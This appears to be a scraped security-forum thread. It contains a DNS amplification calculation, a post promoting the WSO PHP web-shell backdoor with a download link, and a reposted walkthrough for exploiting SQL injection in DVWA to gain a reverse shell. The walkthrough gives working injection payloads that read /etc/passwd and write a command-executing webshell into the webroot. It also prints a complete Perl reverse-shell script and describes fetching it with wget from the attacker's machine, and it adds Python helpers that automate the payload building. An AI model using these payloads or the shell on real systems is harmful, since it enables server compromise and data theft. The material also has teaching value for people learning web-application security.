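amplification = RESPONSE_BYTES / REQUEST_BYTES
print(f"amplification: ~{amplification:.0f}x")  # ~83x, roughly the 100x order of magnitude quoted

# bandwidth the attacker must actually source to reflect 75 Gbps at the victim
attack_gbps = 75
attacker_gbps = attack_gbps / amplification
print(f"attacker sends only ~{attacker_gbps:.2f} Gbps of spoofed queries")
```

In other words, under 1 Gbps of spoofed queries is enough to point 75 Gbps at a target, which is why open resolvers plus spoofable source addresses are such an attractive combination.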
  23. Omg, what did you do? You crashed the RST server...
  24. [h=2]WSO 2.5.1 [Ethical Shell][/h]
WSO is a PHP shell backdoor that provides an interface for various remote operations. It can perform everything from remote code execution and bruteforcing of servers to providing server information, and more.
Download (packetstorm) link: http://packetstormsecurity.org/files/117974/WSO-Web-Shell-2.5.1.html

Features:
- Cookie-based authorization
- Server information
- File manager (copy, rename, move, delete, chmod, touch, create files and folders)
- View, hexview, edit, download, upload files
- Working with zip archives (packing, unpacking) + tar.gz compression
- Console
- SQL manager (MySql, PostgreSql)
- Execute PHP code
- Working with strings + hash search in online databases
- Bindport and back-connect (Perl)
- Bruteforce FTP, MySQL, PgSQL
- Search files, search text in files
- Support for *nix-like and Windows systems
- Anti-search-engine ("antipoiskovik": checks the User-Agent and returns a 404 error to search engines)
- AJAX support
- Small size: the packaged version is 22.8 Kb
- Choice of the encoding the shell uses

Changelog (v2.5.1):
- Removed comments from the first line.
- Added option to dump certain columns of tables.
- Sizes of large files are now determined correctly.
- In the file properties, the "Create time" field was changed to "Change time" (PHP: filectime - Manual).
- Fixed a bug that broke the MySQL brute force when a server port was specified.
- Fixed a bug that made it impossible to view the contents of a table named "download" in the database.

Youtube link: https://www.youtube.com/watch?v=MreAwLEXK_E
Sursa: WSO 2.5.1 [Ethical Shell ]
  25. [h=1]Anatomy of an attack: Gaining Reverse Shell from SQL injection[/h]
Shashank March 28, 2013

SQL injection opens up a lot of possibilities for an attacker, like dumping the database, causing denial of service, or stealing sensitive information. But it becomes more interesting when it can be used to compromise a server. Different SQL databases, like MSSQL, MySQL, Oracle, and PL/SQL, pose different sets of challenges for the attacker once the injection is detected. I have taken MySQL as the database for demonstrating the anatomy of the SQL injection attack. This post talks about simple techniques to exploit SQL injection (SQLi) and gain a reverse shell. For the SQLi attack there are a few basic steps:

Identify: the SQL injection point.
Take: MySQL's help to explore the SQL injection further.
Exploit: upload the webshell and get the reverse connection.

For the demo I am using Damn Vulnerable Web Application (DVWA). It is easy to install and can be downloaded from http://www.dvwa.co.uk/. DVWA is a PHP/MySQL/Apache application purposefully made vulnerable. It is a good tool for web application security enthusiasts to begin with. I will be using two scenarios, one where DVWA is installed on a Linux OS and another on a Windows OS. The concept behind the attack is the same in both scenarios, but there is a slight difference in exploitation that we will discuss later. It is easy to install and configure DVWA, and for the demo I have kept the script security at "low".

Identify: the SQL injection point.

Identifying the SQL injection is the key step, and it takes a lot of skill and experience to identify the injection point. By analyzing the application properly, the possible injection points can be identified. Like in the screenshot shown below, the User ID field could be vulnerable to SQL injection. It takes an integer as input and displays the First Name and Surname associated with the User ID provided. Let us put a quote (') in the User ID.
We can see that a database error is generated, which confirms that the application is leaking database errors; also, the database in use is MySQL. If you look at the error closely, it is a syntax error. The reason is that the backend SQL query causes a syntax error when supplied a quote (') instead of an integer. If I try to imagine the query at the backend, it would be something like:

MySQL> select first_name, last_name from users where user_id=' ';

If the provided input is the quote ('), the SQL query breaks and becomes:

MySQL> select first_name, last_name from users where user_id=''';

And hence it creates a syntax error. So the injection point is identified as the User ID field, and it is possible to communicate with the backend SQL server from the front end, which makes SQL injection possible.

Take: MySQL's help to explore the SQL injection further.

Let's dig further and try to enumerate, to guess the backend query, the number of columns used in the query, the database name, the MySQL version, etc. Our guess about the backend query from the front end is something like:

MySQL> select first_name, last_name from users where user_id=1;

But it is just a wild guess. We'll need proper enumeration of the backend query, for which MySQL helps us. MySQL gives us ORDER BY. Now why are we using ORDER BY? ORDER BY sorts the results according to the columns. The query above uses 2 columns, so using ORDER BY the result can be sorted according to column 1 (first_name) or according to column 2 (last_name). So the query will execute only when it is sorted by a column actually used in the query. But if I want to sort the results by column 3 (which is not used in the query), MySQL will generate an error saying:

ERROR 1054 (42S22): Unknown column '3' in 'order clause'

So the deduction would be: when I used ORDER BY with 2 I didn't get any error, but when I used it with 3 I got the above error, so the number of columns used in the backend query is 2.
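The ORDER BY deduction above is mechanical enough to automate: raise the column index until the page errors out. In the sketch below, `page_errors` is a hypothetical stand-in for submitting the payload and checking the response for a MySQL error; against a live DVWA instance it would be an HTTP request instead.

```python
def page_errors(injection):
    """Stub simulating the vulnerable app: the real backend query uses
    2 columns, so ORDER BY 3 and above produce 'Unknown column' errors."""
    n = int(injection.split("order by")[1].split("#")[0])
    return n > 2          # True means the page showed a MySQL error

def count_columns(errors_oracle, max_cols=32):
    """Probe "' order by N #" for increasing N; the last N that does NOT
    error is the number of columns in the backend SELECT."""
    for n in range(1, max_cols + 1):
        payload = f"' order by {n} #"
        if errors_oracle(payload):
            return n - 1
    return max_cols

print(count_columns(page_errors))   # 2, matching the manual deduction
```

Tools like sqlmap perform exactly this kind of probing automatically; doing it by hand, as the post does, just makes each step visible.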
In this way, our work to guess the number of columns becomes easy with ORDER BY. Let's try it here. Using id= ' order by 3 # the application throws a MySQL error and tells us that the 3rd column is not used in the query. The (#) used here comments out the rest of the backend query. So it will be like:

MySQL> select first_name, last_name from users where user_id=' ' order by 3 # ';

And using id= ' order by 2 # no error is generated, which confirms that the number of columns used in the backend query is 2.

Now, to enumerate further, let us use a UNION query. Why are we using UNION? UNION combines the results of 2 SELECT queries. From our previous ORDER BY operation we know that the query contains 2 columns. One SELECT query is the backend query, over which we have no control, but we can introduce UNION with another SELECT query designed by us, and the page will display the union of the results of the 2 queries. The final query at the backend would be something like this after our injection using UNION SELECT. Make sure that, since the main query uses 2 columns, the UNION SELECT also uses exactly 2 columns, because both SELECT queries must have the same number of columns:

MySQL> select first_name, last_name from users where user_id=' ' union select 1,2;

By using the UNION query, we can see that the results get displayed on the page, which is the union of the backend SELECT query in use and our inserted SELECT query. Since we can design our SELECT query, it allows us to enumerate well. So we will use the next injection:

' UNION SELECT user(), database() #

It will display the current user and the database in use. Playing further with it using session_user() and current_user(), we can also learn the version of MySQL in use. And to make it even better, MySQL provides us the load_file() function, with which we can read files. Let's read /etc/passwd by injecting:

' UNION SELECT 1, load_file('/etc/passwd') #

Now it is time for exploitation using UNION SELECT.
Exploit: upload the webshell and get the reverse connection.

Here comes the exploitation part. Until now we were focused on reading and enumerating. The plan is to upload a webshell to the webroot. To confirm the webroot, we browsed to the PHPinfo.php file, which contains a lot of information about the webserver, including the webroot. We confirmed that /var/www/ is the webroot, which is the default location for the Apache server. Identifying the correct webroot is very important. For Apache we already know the default webroot, but sysadmins might change the default path. In this application we have the luxury of looking into PHPinfo.php, but this might not be the case all the time. One of the methods is looking into errors generated by the application, which might reveal the installation path. So an aware developer can make this step difficult for an attacker by hiding the webroot info.

Now we will use UNION SELECT to create a PHP file in the webroot using INTO OUTFILE. INTO OUTFILE writes the selected rows to a file. The injection below creates the cmd.php file in the webroot, which will execute OS commands for us. So injecting:

' union select 1,'' INTO OUTFILE '/var/www/dvwa/cmd.php' #

Those who know PHP can easily make out that we are inserting a PHP script '' which will run system commands by taking an argument via GET, and this script will be written to a PHP file (cmd.php) located in the webroot directory. This method works when you have permission to write to the webroot. An aware system admin might change the permissions of the installation folder, which would make this attack impossible.

As we can see, the injection is successful and we can browse to cmd.php uploaded in the webroot. Let us run some operating system commands. As the id command shows, we have the privileges of the Apache user. We can run a couple of other commands and play around, but in order to escalate privileges we will need an interactive shell.
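The INTO OUTFILE injection has to keep the column count that the ORDER BY step revealed, padding the extra positions with integers. Below is a hypothetical helper that builds such a payload; the `php_stub` argument stands in for the one-liner the post describes (a script that runs system commands taken from a GET parameter), which is elided in the text above.

```python
def build_outfile_payload(columns, php_stub, outfile):
    """Build a UNION SELECT ... INTO OUTFILE injection whose column count
    matches the backend query; extra columns are padded with integers."""
    fillers = [str(i) for i in range(1, columns)]          # 1, 2, ... placeholders
    select_list = ", ".join(fillers + [f"'{php_stub}'"])   # shell source goes last
    return f"' union select {select_list} INTO OUTFILE '{outfile}' #"

payload = build_outfile_payload(
    columns=2,                                   # from the ORDER BY enumeration
    php_stub="<?php system($_GET['cmd']); ?>",   # assumed generic GET-driven stub
    outfile="/var/www/dvwa/cmd.php",
)
print(payload)
```

The generated string has the same shape as the post's injection: one integer filler, then the quoted PHP source, then the INTO OUTFILE target inside the writable webroot.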
So it is required to gain a reverse connection. Let us check whether Perl is installed on the system by running perl -h. Now let's download the Perl back-connect script from the attacker's system and save it in /tmp using the wget command. The Perl back-connect script I am using is very simple and takes an IP and port as arguments. /tmp gives us write permission, and that is the reason why we are saving it there.

Perl back-connect script:

#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("/bin/sh -i");

Let us check whether the command was successful or not. And yes, backconnect.pl is present in /tmp. Now we will launch netcat on port 8000 and wait for the connection. Also, try running the Perl back-connect script. Yes, we got the reverse connection, and we have an interactive shell to use. This shell can be used to launch local privilege escalation exploits to give the attacker root privileges on the server.

Now let's replicate the same steps on Windows. For the demo I have installed DVWA in a WAMP server on Windows. First, try UNION SELECT along with load_file() on Windows. We want to read a file located on the E drive in Windows. The path of the file is e:/testfile.txt. The injection would be:

' union select 1, load_file('e:\\testfile.txt') #

It is important to specify the path of the file properly: the path is written as e:\\testfile.txt because MySQL reads (\\) as a backslash character ("\"), since (\) is an escape character.
The injection can also be written as:

' union select 1, load_file('e:\/testfile.txt') #

Now, to upload the webshell, find the webroot of the application installed on Windows. It is mentioned in the PHPinfo.php file. The webroot is confirmed as c:/wamp/www/DVWA/dvwa/. The injection for uploading the webshell would be:

' union select 1, '' INTO OUTFILE 'c:\\wamp\\www\\DVWA\\dvwa\\cmd.php' #

There is no error generated; it seems the injection was successful. Let's check cmd.php. And yes, it is working perfectly fine. We can run different commands and play around with the webshell. For example, whoami tells us that we have NTauthority\system privileges.

This is how an SQL injection can be deadly. It shows that a big responsibility lies on the shoulders of the developers of the application and the system/database admins. A single mistake can compromise the application and the server as well.

Sursa: http://resources.infosecinstitute.com/anatomy-of-an-attack-gaining-reverse-shell-from-sql-injection/
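The backslash-doubling rule is worth seeing concretely. A quick sketch of the two escaping options MySQL accepts for the same Windows path (the path itself is the example file from the post):

```python
# MySQL string literals treat backslash as an escape character, so a
# Windows path inside an injection must double each backslash
# (or simply use forward slashes, which Windows also accepts).
windows_path = r"e:\testfile.txt"

mysql_literal = windows_path.replace("\\", "\\\\")
print(mysql_literal)    # e:\\testfile.txt  -- what the injection string must contain

forward_slash = windows_path.replace("\\", "/")
print(forward_slash)    # e:/testfile.txt   -- also usable in load_file()
```

Getting this wrong doesn't produce an error so much as a silent NULL from load_file(), because MySQL collapses the single backslash into an escape sequence and looks for a path that doesn't exist.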